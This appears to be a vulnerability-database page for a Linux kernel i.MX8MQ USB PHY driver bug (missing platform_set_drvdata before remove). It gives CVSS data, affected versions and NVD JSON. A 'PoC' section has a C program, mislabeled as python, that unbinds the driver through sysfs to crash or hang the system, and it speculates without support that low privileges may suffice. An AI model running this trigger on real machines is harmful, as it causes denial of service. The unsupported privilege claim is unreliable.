Security Vulnerability Report
中文
CVE-2026-43259 CVSS 5.5 MEDIUM

CVE-2026-43259

Published: 2026-05-06 12:16:47
Last Modified: 2026-05-08 20:31:42
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: phy: fsl-imx8mq-usb: set platform driver data Add missing platform_set_drvdata() as the data will be used in remove().

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43259 * Trigger the remove function of the vulnerable fsl-imx8mq-usb driver. * This requires the device to be bound to the driver first. * Compilation: gcc poc.c -o poc */ #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdlib.h> int main() { int fd; // The unbind path for the specific driver const char *unbind_path = "/sys/bus/platform/drivers/fsl-imx8mq-usb-phy/unbind"; // The device ID may vary depending on the hardware configuration // Common IDs for imx8mq usb phy might look like '382f0000.usbphy' const char *device_id = "382f0000.usbphy"; // Check if we are root (usually required for unbind) if (getuid() != 0) { printf("[!] This PoC typically requires root privileges to write to sysfs."); // Attempting anyway as per PR:L (Low Privilege) context, sometimes permissions are loose } printf("[*] Attempting to unbind driver %s from device %s\n", "fsl-imx8mq-usb-phy", device_id); fd = open(unbind_path, O_WRONLY); if (fd < 0) { perror("[-] Failed to open unbind path"); printf("[-] Ensure the driver is loaded and the path exists.\n"); return 1; } if (write(fd, device_id, strlen(device_id)) < 0) { perror("[-] Failed to write to unbind"); close(fd); return 1; } printf("[+] Triggered driver unbind.\n"); printf("[+] If the system crashes or hangs, the vulnerability is confirmed.\n"); close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43259", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:46.777", "lastModified": "2026-05-08T20:31:42.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: fsl-imx8mq-usb: set platform driver data\n\nAdd missing platform_set_drvdata() as the data will be used in remove()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/06db8c06d94858cda4b3870f421a1aeeef617690", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/42d9509161d0539767ba875f3ef6b4b3c0b425ed", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/debf8326a435ac746f48173e4742a574810f1ff4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}